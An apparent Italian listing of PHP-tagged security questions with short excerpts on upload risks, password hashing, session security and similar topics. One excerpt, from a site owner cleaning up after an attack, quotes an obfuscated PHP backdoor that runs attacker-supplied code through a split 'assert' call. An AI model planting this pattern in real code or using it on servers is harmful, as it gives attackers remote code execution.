Domande con tag 'php'

domande con tag
4
risposte

Quali sono le minacce alla sicurezza dei caricamenti di file zip e quali azioni preventive dovrebbero essere intraprese?

Abbiamo un'applicazione Drupal sviluppata per condividere file. Stiamo consentendo il caricamento di file zip da parte di un utente del dipartimento connesso. Utilizziamo il file system privato Drupal (al di fuori di webroot). Stiamo uti...
posta 04.04.2013 - 09:38
6
risposte

C'è un modo per scaricare un file PHP senza che venga eseguito?

Recentemente ho ricevuto una mail di phishing di qualità insolitamente cattiva; "Per favore accedi subito al seguente link, dato che siamo la tua banca, lo sai" -ish. Il link punta a un URL non convincente con .php alla fine. Mi chiedevo...
posta 03.09.2015 - 10:51
5
risposte

E 'possibile trovare un buffer overflow in WordPress?

Ho avuto una conversazione interessante con un pentester che mi ha detto di aver trovato un buffer overflow in Wordpress. La persona in questione era davvero irremovibile sul fatto che fosse vero. Il cliente è un po 'scettico riguardo alle capac...
posta 08.02.2018 - 10:38
3
risposte

Quanto sono sicuri sha256 + hash salati per l'archiviazione delle password [duplicato]

Ho iniziato a leggere di hashing delle password di recente su più siti come questa pagina su crackstation e altri, e per cosa Ho capito, dovrei evitare di usare algoritmi di hashing come md5 e sha1 perché sono obsoleti e invece, dovrei usare...
posta 25.05.2015 - 20:23
3
risposte

Malware PHP su server - ma incapace di identificare il codice dannoso

Sono nuovo in questa comunità, quindi per favore perdonami se la mia domanda è stupida. Ho scoperto che il mio server è stato violato e ho trovato diversi file PHP su di esso. Non sono stato pigro e ho fatto del mio meglio per rilevare ciò...
posta 16.09.2016 - 17:50
2
risposte

exploit di caratteri multibyte - PHP / MySQL

Qualcuno potrebbe indicarmi un collegamento con alcune informazioni sugli exploit di caratteri multibyte per MySQL? Un amico li ha portati alla mia attenzione, ma non sono riuscito a trovare molte informazioni su Internet.     
posta 20.12.2011 - 07:08
2
risposte

Cosa fa questo codice PHP sospetto? [duplicare]

Sto ripulendo un sito Web dopo un attacco che ha comportato il caricamento di molte% di% shellPHP. Ho trovato e rimosso il seguente codice: if(isset($_REQUEST['e'])) { $b="ass"."ert";$a=$b($_REQUEST['e']);${'a'}; } Potresti dirmi cosa fa?...
posta 13.01.2017 - 00:06
9
risposte

Perché la gente dice che PHP è intrinsecamente insicuro?

Ho sentito dire che PHP è intrinsecamente insicuro. È vero? Perché?     
posta 21.11.2010 - 16:54
3
risposte

Creazione di sessioni PHP sicure

Ho già creato e perfezionato sia i sistemi di registrazione che i sistemi di accesso, tuttavia sono convinto che la parte difficile sia quando si crea una sessione. Per quanto ne so, ciò è dovuto sia ad Hijacking che alla fissazione. Che in tutt...
posta 13.11.2012 - 02:10
3
risposte

È possibile eseguire uno script php in un file immagine? [duplicare]

Ho un sito Web di php per caricare le immagini. Gli utenti possono caricare immagini sul mio sito web. Un utente afferma di poter hackerare il mio sito Web utilizzando un'immagine caricata. Ho aperto tutte le immagini che ha caricato sul mi...
posta 21.03.2013 - 08:16